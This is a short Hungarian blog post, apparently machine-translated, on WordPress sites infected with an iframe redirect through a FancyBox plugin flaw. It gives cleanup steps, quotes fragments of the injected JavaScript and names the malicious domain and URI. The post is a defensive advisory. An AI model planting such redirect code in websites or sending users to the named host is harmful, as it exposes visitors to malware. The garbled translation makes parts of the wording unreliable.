[Malware iframe 203koko] Malware fertőzött WordPress oldalak

A hét elején számos honlapok és blogok WordPressfigyelmeztetéseket kapott rosszindulatú fertőzés keresztül Google Webmasters.

A probléma, amelyre Google Webmasters utalt, a jelenléte tőkehal / forgatókönyv iframe rosszindulatú program a forrás honlapok.

if (navigator.userAgent.match(/msie/i)) { document.write(‘ ’); }

Úgy tűnik, hogy ez egy sebezhetőség a csatlakoztatvívmányok FancyBox for WordPress ami egészen tegnapig (05.02.2015) nem frissült sokáig.
E probléma megoldása és fertőtlenítő vírusok oldalak ezzel a rosszindulatú programmal, viszonylag egyszerű.
1. Tiltsa le a FancyBox plugint.
2. Törölje az összes FancyBox plugin fájlt a kiszolgálóról (FTP-n keresztül)
3. Telepítse a bővítmény új verzióját (Fancybox 3.0.4)

Fancybox a WordPress 3.0.4

- Átnevezte a 3.0.3-ban említett biztonsági probléma által érintett beállítást. Ennek meg kell akadályoznia a rosszindulatú kód megjelenését azokon a webhelyeken, ahol a bővítmény frissül, anélkül, hogy eltávolítaná a rosszindulatú kódot.

Fancybox a WordPress 3.0.3

Javítva egy biztonsági kérdés.

Malware információ: 

TYPE: Iframe átirányítás
TARGET: WordPress Fancybox
KÁRTÉKONY DOMAIN: 203koko.eu
KÁRTÉKONY URI: http://203koko.eu/hjnfh/ipframe2.php
Rosszindulatú nyers kód:
MALWARE ÍRT: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Eltávolítani malware WordPress honlapján.

[Malware iframe 203koko] Malware fertőzött WordPress oldalak

A szerzőről

Stealth LP

Alapítója és szerkesztője Lopakodás SettingsA 2006 dátumot.
Tapasztalat Linux operációs rendszerek (különösen a CentOS), a Mac OS X, Windows XP> Windows 10 és a WordPress (CMS).

Írj hozzászólást